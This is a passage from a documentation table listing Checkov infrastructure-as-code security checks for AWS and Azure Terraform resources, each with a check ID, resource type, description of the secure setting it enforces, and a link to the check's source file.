Ensure AWS ElasticSearch/OpenSearch Fine-grained access control is enabled | Terraform | [OpenSearchDomainHasFineGrainedControl.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/OpenSearchDomainHasFineGrainedControl.yaml) | -| 1172 | CKV2_AWS_53 | resource | aws_api_gateway_method | Ensure AWS API gateway request is validated | Terraform | [APIGatewayRequestParameterValidationEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/APIGatewayRequestParameterValidationEnabled.yaml) | -| 1173 | CKV2_AWS_54 | resource | aws_cloudfront_distribution | Ensure AWS CloudFront distribution is using secure SSL protocols for HTTPS communication | Terraform | [CloudFrontUsesSecureProtocolsForHTTPS.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CloudFrontUsesSecureProtocolsForHTTPS.yaml) | -| 1174 | CKV2_AWS_55 | resource | aws_emr_cluster | Ensure AWS EMR cluster is configured with security configuration | Terraform | [EMRClusterHasSecurityConfiguration.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/EMRClusterHasSecurityConfiguration.yaml) | -| 1175 | CKV2_AWS_56 | resource | aws_iam_group_policy_attachment | Ensure AWS Managed IAMFullAccess IAM policy is not used. | Terraform | [IAMManagedIAMFullAccessPolicy.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/IAMManagedIAMFullAccessPolicy.yaml) | -| 1176 | CKV2_AWS_56 | resource | aws_iam_policy_attachment | Ensure AWS Managed IAMFullAccess IAM policy is not used. | Terraform | [IAMManagedIAMFullAccessPolicy.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/IAMManagedIAMFullAccessPolicy.yaml) | -| 1177 | CKV2_AWS_56 | resource | aws_iam_role | Ensure AWS Managed IAMFullAccess IAM policy is not used. | Terraform | [IAMManagedIAMFullAccessPolicy.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/IAMManagedIAMFullAccessPolicy.yaml) | -| 1178 | CKV2_AWS_56 | resource | aws_iam_role_policy_attachment | Ensure AWS Managed IAMFullAccess IAM policy is not used. | Terraform | [IAMManagedIAMFullAccessPolicy.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/IAMManagedIAMFullAccessPolicy.yaml) | -| 1179 | CKV2_AWS_56 | resource | aws_iam_user_policy_attachment | Ensure AWS Managed IAMFullAccess IAM policy is not used. | Terraform | [IAMManagedIAMFullAccessPolicy.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/IAMManagedIAMFullAccessPolicy.yaml) | -| 1180 | CKV2_AWS_56 | resource | aws_ssoadmin_managed_policy_attachment | Ensure AWS Managed IAMFullAccess IAM policy is not used. | Terraform | [IAMManagedIAMFullAccessPolicy.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/IAMManagedIAMFullAccessPolicy.yaml) | -| 1181 | CKV2_AWS_56 | resource | data.aws_iam_policy | Ensure AWS Managed IAMFullAccess IAM policy is not used. | Terraform | [IAMManagedIAMFullAccessPolicy.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/IAMManagedIAMFullAccessPolicy.yaml) | -| 1182 | CKV2_AWS_57 | resource | aws_secretsmanager_secret | Ensure Secrets Manager secrets should have automatic rotation enabled | Terraform | [SecretsAreRotated.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/SecretsAreRotated.yaml) | -| 1183 | CKV2_AWS_58 | resource | aws_neptune_cluster | Ensure AWS Neptune cluster deletion protection is enabled | Terraform | [NeptuneDeletionProtectionEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/NeptuneDeletionProtectionEnabled.yaml) | -| 1184 | CKV2_AWS_59 | resource | aws_elasticsearch_domain | Ensure ElasticSearch/OpenSearch has dedicated master node enabled | Terraform | [ElasticSearchDedicatedMasterEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/ElasticSearchDedicatedMasterEnabled.yaml) | -| 1185 | CKV2_AWS_59 | resource | aws_opensearch_domain | Ensure ElasticSearch/OpenSearch has dedicated master node enabled | Terraform | [ElasticSearchDedicatedMasterEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/ElasticSearchDedicatedMasterEnabled.yaml) | -| 1186 | CKV2_AWS_60 | resource | aws_db_instance | Ensure RDS instance with copy tags to snapshots is enabled | Terraform | [RDSEnableCopyTagsToSnapshot.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/RDSEnableCopyTagsToSnapshot.yaml) | -| 1187 | CKV2_AWS_61 | resource | aws_s3_bucket | Ensure that an S3 bucket has a lifecycle configuration | Terraform | [S3BucketLifecycle.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/S3BucketLifecycle.yaml) | -| 1188 | CKV2_AWS_62 | resource | aws_s3_bucket | Ensure S3 buckets should have event notifications enabled | Terraform | [S3BucketEventNotifications.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/S3BucketEventNotifications.yaml) | -| 1189 | CKV2_AWS_63 | resource | aws_networkfirewall_firewall | Ensure Network firewall has logging configuration defined | Terraform | [NetworkFirewallHasLogging.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/NetworkFirewallHasLogging.yaml) | -| 1190 | CKV2_AWS_64 | resource | aws_kms_key | Ensure KMS key Policy is defined | Terraform | [KmsKeyPolicyIsDefined.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/KmsKeyPolicyIsDefined.yaml) | -| 1191 | CKV2_AWS_65 | resource | aws_s3_bucket_ownership_controls | Ensure access control lists for S3 buckets are disabled | Terraform | [AWSdisableS3ACL.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/AWSdisableS3ACL.yaml) | -| 1192 | CKV2_AWS_66 | resource | aws_mwaa_environment | Ensure MWAA environment is not publicly accessible | Terraform | [AWS_private_MWAA_environment.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/AWS_private_MWAA_environment.yaml) | -| 1193 | CKV_AZURE_1 | resource | azurerm_linux_virtual_machine | Ensure Azure Instance does not use basic authentication(Use SSH Key Instead) | Terraform | [AzureInstancePassword.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureInstancePassword.py) | -| 1194 | CKV_AZURE_1 | resource | azurerm_virtual_machine | Ensure Azure Instance does not use basic authentication(Use SSH Key Instead) | Terraform | [AzureInstancePassword.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureInstancePassword.py) | -| 1195 | CKV_AZURE_2 | resource | azurerm_managed_disk | Ensure Azure managed disk has encryption enabled | Terraform | [AzureManagedDiskEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureManagedDiskEncryption.py) | -| 1196 | CKV_AZURE_3 | resource | azurerm_storage_account | Ensure that 'enable_https_traffic_only' is enabled | Terraform | [StorageAccountsTransportEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/StorageAccountsTransportEncryption.py) | -| 1197 | CKV_AZURE_4 | resource | azurerm_kubernetes_cluster | Ensure AKS logging to Azure Monitoring is Configured | Terraform | [AKSLoggingEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AKSLoggingEnabled.py) | -| 1198 | CKV_AZURE_5 | resource | azurerm_kubernetes_cluster | Ensure RBAC is enabled on AKS clusters | Terraform | [AKSRbacEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AKSRbacEnabled.py) | -| 1199 | CKV_AZURE_6 | resource | azurerm_kubernetes_cluster | Ensure AKS has an API Server Authorized IP Ranges enabled | Terraform | [AKSApiServerAuthorizedIpRanges.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AKSApiServerAuthorizedIpRanges.py) | -| 1200 | CKV_AZURE_7 | resource | azurerm_kubernetes_cluster | Ensure AKS cluster has Network Policy configured | Terraform | [AKSNetworkPolicy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AKSNetworkPolicy.py) | -| 1201 | CKV_AZURE_8 | resource | azurerm_kubernetes_cluster | Ensure Kubernetes Dashboard is disabled | Terraform | [AKSDashboardDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AKSDashboardDisabled.py) | -| 1202 | CKV_AZURE_9 | resource | azurerm_network_security_group | Ensure that RDP access is restricted from the internet | Terraform | [NSGRuleRDPAccessRestricted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/NSGRuleRDPAccessRestricted.py) | -| 1203 | CKV_AZURE_9 | resource | azurerm_network_security_rule | Ensure that RDP access is restricted from the internet | Terraform | [NSGRuleRDPAccessRestricted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/NSGRuleRDPAccessRestricted.py) | -| 1204 | CKV_AZURE_10 | resource | azurerm_network_security_group | Ensure that SSH access is restricted from the internet | Terraform | [NSGRuleSSHAccessRestricted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/NSGRuleSSHAccessRestricted.py) | -| 1205 | CKV_AZURE_10 | resource | azurerm_network_security_rule | Ensure that SSH access is restricted from the internet | Terraform | [NSGRuleSSHAccessRestricted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/NSGRuleSSHAccessRestricted.py) | -| 1206 | CKV_AZURE_11 | resource | azurerm_mariadb_firewall_rule | Ensure no SQL Databases allow ingress from 0.0.0.0/0 (ANY IP) | Terraform | [SQLServerNoPublicAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/SQLServerNoPublicAccess.py) | -| 1207 | CKV_AZURE_11 | resource | azurerm_mysql_firewall_rule | Ensure no SQL Databases allow ingress from 0.0.0.0/0 (ANY IP) | Terraform | [SQLServerNoPublicAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/SQLServerNoPublicAccess.py) | -| 1208 | CKV_AZURE_11 | resource | azurerm_postgresql_firewall_rule | Ensure no SQL Databases allow ingress from 0.0.0.0/0 (ANY IP) | Terraform | [SQLServerNoPublicAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/SQLServerNoPublicAccess.py) | -| 1209 | CKV_AZURE_11 | resource | azurerm_sql_firewall_rule | Ensure no SQL Databases allow ingress from 0.0.0.0/0 (ANY IP) | Terraform | [SQLServerNoPublicAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/SQLServerNoPublicAccess.py) | -| 1210 | CKV_AZURE_12 | resource | azurerm_network_watcher_flow_log | Ensure that Network Security Group Flow Log retention period is 'greater than 90 days' | Terraform | [NetworkWatcherFlowLogPeriod.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/NetworkWatcherFlowLogPeriod.py) | -| 1211 | CKV_AZURE_13 | resource | azurerm_app_service | Ensure App Service Authentication is set on Azure App Service | Terraform | [AppServiceAuthentication.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceAuthentication.py) | -| 1212 | CKV_AZURE_13 | resource | azurerm_linux_web_app | Ensure App Service Authentication is set on Azure App Service | Terraform | [AppServiceAuthentication.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceAuthentication.py) | -| 1213 | CKV_AZURE_13 | resource | azurerm_windows_web_app | Ensure App Service Authentication is set on Azure App Service | Terraform | [AppServiceAuthentication.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceAuthentication.py) | -| 1214 | CKV_AZURE_14 | resource | azurerm_app_service | Ensure web app redirects all HTTP traffic to HTTPS in Azure App Service | Terraform | [AppServiceHTTPSOnly.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceHTTPSOnly.py) | -| 1215 | CKV_AZURE_14 | resource | azurerm_linux_web_app | Ensure web app redirects all HTTP traffic to HTTPS in Azure App Service | Terraform | [AppServiceHTTPSOnly.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceHTTPSOnly.py) | -| 1216 | CKV_AZURE_14 | resource | azurerm_windows_web_app | Ensure web app redirects all HTTP traffic to HTTPS in Azure App Service | Terraform | [AppServiceHTTPSOnly.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceHTTPSOnly.py) | -| 1217 | CKV_AZURE_15 | resource | azurerm_app_service | Ensure web app is using the latest version of TLS encryption | Terraform | [AppServiceMinTLSVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceMinTLSVersion.py) | -| 1218 | CKV_AZURE_15 | resource | azurerm_linux_web_app | Ensure web app is using the latest version of TLS encryption | Terraform | [AppServiceMinTLSVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceMinTLSVersion.py) | -| 1219 | CKV_AZURE_15 | resource | azurerm_windows_web_app | Ensure web app is using the latest version of TLS encryption | Terraform | [AppServiceMinTLSVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceMinTLSVersion.py) | -| 1220 | CKV_AZURE_16 | resource | azurerm_app_service | Ensure that Register with Azure Active Directory is enabled on App Service | Terraform | [AppServiceIdentity.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceIdentity.py) | -| 1221 | CKV_AZURE_16 | resource | azurerm_linux_web_app | Ensure that Register with Azure Active Directory is enabled on App Service | Terraform | [AppServiceIdentity.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceIdentity.py) | -| 1222 | CKV_AZURE_16 | resource | azurerm_windows_web_app | Ensure that Register with Azure Active Directory is enabled on App Service | Terraform | [AppServiceIdentity.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceIdentity.py) | -| 1223 | CKV_AZURE_17 | resource | azurerm_app_service | Ensure the web app has 'Client Certificates (Incoming client certificates)' set | Terraform | [AppServiceClientCertificate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceClientCertificate.py) | -| 1224 | CKV_AZURE_17 | resource | azurerm_linux_web_app | Ensure the web app has 'Client Certificates (Incoming client certificates)' set | Terraform | [AppServiceClientCertificate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceClientCertificate.py) | -| 1225 | CKV_AZURE_17 | resource | azurerm_windows_web_app | Ensure the web app has 'Client Certificates (Incoming client certificates)' set | Terraform | [AppServiceClientCertificate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceClientCertificate.py) | -| 1226 | CKV_AZURE_18 | resource | azurerm_app_service | Ensure that 'HTTP Version' is the latest if used to run the web app | Terraform | [AppServiceHttps20Enabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceHttps20Enabled.py) | -| 1227 | CKV_AZURE_18 | resource | azurerm_linux_web_app | Ensure that 'HTTP Version' is the latest if used to run the web app | Terraform | [AppServiceHttps20Enabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceHttps20Enabled.py) | -| 1228 | CKV_AZURE_18 | resource | azurerm_windows_web_app | Ensure that 'HTTP Version' is the latest if used to run the web app | Terraform | [AppServiceHttps20Enabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceHttps20Enabled.py) | -| 1229 | CKV_AZURE_19 | resource | azurerm_security_center_subscription_pricing | Ensure that standard pricing tier is selected | Terraform | [SecurityCenterStandardPricing.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/SecurityCenterStandardPricing.py) | -| 1230 | CKV_AZURE_20 | resource | azurerm_security_center_contact | Ensure that security contact 'Phone number' is set | Terraform | [SecurityCenterContactPhone.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/SecurityCenterContactPhone.py) | -| 1231 | CKV_AZURE_21 | resource | azurerm_security_center_contact | Ensure that 'Send email notification for high severity alerts' is set to 'On' | Terraform | [SecurityCenterContactEmailAlert.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/SecurityCenterContactEmailAlert.py) | -| 1232 | CKV_AZURE_22 | resource | azurerm_security_center_contact | Ensure that 'Send email notification for high severity alerts' is set to 'On' | Terraform | [SecurityCenterContactEmailAlertAdmins.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/SecurityCenterContactEmailAlertAdmins.py) | -| 1233 | CKV_AZURE_23 | resource | azurerm_mssql_server | Ensure that 'Auditing' is set to 'On' for SQL servers | Terraform | [SQLServerAuditingEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/SQLServerAuditingEnabled.yaml) | -| 1234 | CKV_AZURE_23 | resource | azurerm_mssql_server_extended_auditing_policy | Ensure that 'Auditing' is set to 'On' for SQL servers | Terraform | [SQLServerAuditingEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/SQLServerAuditingEnabled.yaml) | -| 1235 | CKV_AZURE_23 | resource | azurerm_sql_server | Ensure that 'Auditing' is set to 'On' for SQL servers | Terraform | [SQLServerAuditingEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/SQLServerAuditingEnabled.yaml) | -| 1236 | CKV_AZURE_24 | resource | azurerm_mssql_server | Ensure that 'Auditing' Retention is 'greater than 90 days' for SQL servers | Terraform | [SQLServerAuditingRetention90Days.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/SQLServerAuditingRetention90Days.yaml) | -| 1237 | CKV_AZURE_24 | resource | azurerm_mssql_server_extended_auditing_policy | Ensure that 'Auditing' Retention is 'greater than 90 days' for SQL servers | Terraform | [SQLServerAuditingRetention90Days.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/SQLServerAuditingRetention90Days.yaml) | -| 1238 | CKV_AZURE_24 | resource | azurerm_sql_server | Ensure that 'Auditing' Retention is 'greater than 90 days' for SQL servers | Terraform | [SQLServerAuditingRetention90Days.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/SQLServerAuditingRetention90Days.yaml) | -| 1239 | CKV_AZURE_25 | resource | azurerm_mssql_server_security_alert_policy | Ensure that 'Threat Detection types' is set to 'All' | Terraform | [SQLServerThreatDetectionTypes.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/SQLServerThreatDetectionTypes.py) | -| 1240 | CKV_AZURE_26 | resource | azurerm_mssql_server_security_alert_policy | Ensure that 'Send Alerts To' is enabled for MSSQL servers | Terraform | [SQLServerEmailAlertsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/SQLServerEmailAlertsEnabled.py) | -| 1241 | CKV_AZURE_27 | resource | azurerm_mssql_server_security_alert_policy | Ensure that 'Email service and co-administrators' is 'Enabled' for MSSQL servers | Terraform | [SQLServerEmailAlertsToAdminsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/SQLServerEmailAlertsToAdminsEnabled.py) | -| 1242 | CKV_AZURE_28 | resource | azurerm_mysql_server | Ensure 'Enforce SSL connection' is set to 'ENABLED' for MySQL Database Server | Terraform | [MySQLServerSSLEnforcementEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/MySQLServerSSLEnforcementEnabled.py) | -| 1243 | CKV_AZURE_29 | resource | azurerm_postgresql_server | Ensure 'Enforce SSL connection' is set to 'ENABLED' for PostgreSQL Database Server | Terraform | [PostgreSQLServerSSLEnforcementEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/PostgreSQLServerSSLEnforcementEnabled.py) | -| 1244 | CKV_AZURE_30 | resource | azurerm_postgresql_configuration | Ensure server parameter 'log_checkpoints' is set to 'ON' for PostgreSQL Database Server | Terraform | [PostgreSQLServerLogCheckpointsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/PostgreSQLServerLogCheckpointsEnabled.py) | -| 1245 | CKV_AZURE_31 | resource | azurerm_postgresql_configuration | Ensure server parameter 'log_connections' is set to 'ON' for PostgreSQL Database Server | Terraform | [PostgreSQLServerLogConnectionsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/PostgreSQLServerLogConnectionsEnabled.py) | -| 1246 | CKV_AZURE_32 | resource | azurerm_postgresql_configuration | Ensure server parameter 'connection_throttling' is set to 'ON' for PostgreSQL Database Server | Terraform | [PostgreSQLServerConnectionThrottlingEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/PostgreSQLServerConnectionThrottlingEnabled.py) | -| 1247 | CKV_AZURE_33 | resource | azurerm_storage_account | Ensure Storage logging is enabled for Queue service for read, write and delete requests | Terraform | [StorageAccountLoggingQueueServiceEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/StorageAccountLoggingQueueServiceEnabled.py) | -| 1248 | CKV_AZURE_34 | resource | azurerm_storage_container | Ensure that 'Public access level' is set to Private for blob containers | Terraform | [StorageBlobServiceContainerPrivateAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/StorageBlobServiceContainerPrivateAccess.py) | -| 1249 | CKV_AZURE_35 | resource | azurerm_storage_account | Ensure default network access rule for Storage Accounts is set to deny | Terraform | [StorageAccountDefaultNetworkAccessDeny.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/StorageAccountDefaultNetworkAccessDeny.py) | -| 1250 | CKV_AZURE_35 | resource | azurerm_storage_account_network_rules | Ensure default network access rule for Storage Accounts is set to deny | Terraform | [StorageAccountDefaultNetworkAccessDeny.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/StorageAccountDefaultNetworkAccessDeny.py) | -| 1251 | CKV_AZURE_36 | resource | azurerm_storage_account | Ensure 'Trusted Microsoft Services' is enabled for Storage Account access | Terraform | [StorageAccountAzureServicesAccessEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/StorageAccountAzureServicesAccessEnabled.py) | -| 1252 | CKV_AZURE_36 | resource | azurerm_storage_account_network_rules | Ensure 'Trusted Microsoft Services' is enabled for Storage Account access | Terraform | [StorageAccountAzureServicesAccessEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/StorageAccountAzureServicesAccessEnabled.py) | -| 1253 | CKV_AZURE_37 | resource | azurerm_monitor_log_profile | Ensure that Activity Log Retention is set 365 days or greater | Terraform | [MonitorLogProfileRetentionDays.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/MonitorLogProfileRetentionDays.py) | -| 1254 | CKV_AZURE_38 | resource | azurerm_monitor_log_profile | Ensure audit profile captures all the activities | Terraform | [MonitorLogProfileCategories.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/MonitorLogProfileCategories.py) | -| 1255 | CKV_AZURE_39 | resource | azurerm_role_definition | Ensure that no custom subscription owner roles are created | Terraform | [CutsomRoleDefinitionSubscriptionOwner.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/CutsomRoleDefinitionSubscriptionOwner.py) | -| 1256 | CKV_AZURE_40 | resource | azurerm_key_vault_key | Ensure that the expiration date is set on all keys | Terraform | [KeyExpirationDate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/KeyExpirationDate.py) | -| 1257 | CKV_AZURE_41 | resource | azurerm_key_vault_secret | Ensure that the expiration date is set on all secrets | Terraform | [SecretExpirationDate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/SecretExpirationDate.py) | -| 1258 | CKV_AZURE_42 | resource | azurerm_key_vault | Ensure the key vault is recoverable | Terraform | [KeyvaultRecoveryEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/KeyvaultRecoveryEnabled.py) | -| 1259 | CKV_AZURE_43 | resource | azurerm_storage_account | Ensure Storage Accounts adhere to the naming rules | Terraform | [StorageAccountName.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/StorageAccountName.py) | -| 1260 | CKV_AZURE_44 | resource | azurerm_storage_account | Ensure Storage Account is using the latest version of TLS encryption | Terraform | [StorageAccountMinimumTlsVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/StorageAccountMinimumTlsVersion.py) | -| 1261 | CKV_AZURE_45 | resource | azurerm_virtual_machine | Ensure that no sensitive credentials are exposed in VM custom_data | Terraform | [VMCredsInCustomData.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/VMCredsInCustomData.py) | -| 1262 | CKV_AZURE_47 | resource | azurerm_mariadb_server | Ensure 'Enforce SSL connection' is set to 'ENABLED' for MariaDB servers | Terraform | [MariaDBSSLEnforcementEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/MariaDBSSLEnforcementEnabled.py) | -| 1263 | CKV_AZURE_48 | resource | azurerm_mariadb_server | Ensure 'public network access enabled' is set to 'False' for MariaDB servers | Terraform | [MariaDBPublicAccessDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/MariaDBPublicAccessDisabled.py) | -| 1264 | CKV_AZURE_49 | resource | azurerm_linux_virtual_machine_scale_set | Ensure Azure linux scale set does not use basic authentication(Use SSH Key Instead) | Terraform | [AzureScaleSetPassword.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureScaleSetPassword.py) | -| 1265 | CKV_AZURE_50 | resource | azurerm_linux_virtual_machine | Ensure Virtual Machine Extensions are not Installed | Terraform | [AzureInstanceExtensions.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureInstanceExtensions.py) | -| 1266 | CKV_AZURE_50 | resource | azurerm_windows_virtual_machine | Ensure Virtual Machine Extensions are not Installed | Terraform | [AzureInstanceExtensions.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureInstanceExtensions.py) | -| 1267 | CKV_AZURE_52 | resource | azurerm_mssql_server | Ensure MSSQL is using the latest version of TLS encryption | Terraform | [MSSQLServerMinTLSVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/MSSQLServerMinTLSVersion.py) | -| 1268 | CKV_AZURE_53 | resource | azurerm_mysql_server | Ensure 'public network access enabled' is set to 'False' for mySQL servers | Terraform | [MySQLPublicAccessDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/MySQLPublicAccessDisabled.py) | -| 1269 | CKV_AZURE_54 | resource | azurerm_mysql_server | Ensure MySQL is using the latest version of TLS encryption | Terraform | [MySQLServerMinTLSVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/MySQLServerMinTLSVersion.py) | -| 1270 | CKV_AZURE_55 | resource | azurerm_security_center_subscription_pricing | Ensure that Azure Defender is set to On for Servers | Terraform | [AzureDefenderOnServers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureDefenderOnServers.py) | -| 1271 | CKV_AZURE_56 | resource | azurerm_function_app | Ensure that function apps enables Authentication | Terraform | [FunctionAppsEnableAuthentication.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/FunctionAppsEnableAuthentication.py) | -| 1272 | CKV_AZURE_57 | resource | azurerm_app_service | Ensure that CORS disallows every resource to access app services | Terraform | [AppServiceDisallowCORS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceDisallowCORS.py) | -| 1273 | CKV_AZURE_57 | resource | azurerm_linux_web_app | Ensure that CORS disallows every resource to access app services | Terraform | [AppServiceDisallowCORS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceDisallowCORS.py) | -| 1274 | CKV_AZURE_57 | resource | azurerm_windows_web_app | Ensure that CORS disallows every resource to access app services | Terraform | [AppServiceDisallowCORS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceDisallowCORS.py) | -| 1275 | CKV_AZURE_58 | resource | azurerm_synapse_workspace | Ensure that Azure Synapse workspaces enables managed virtual networks | Terraform | 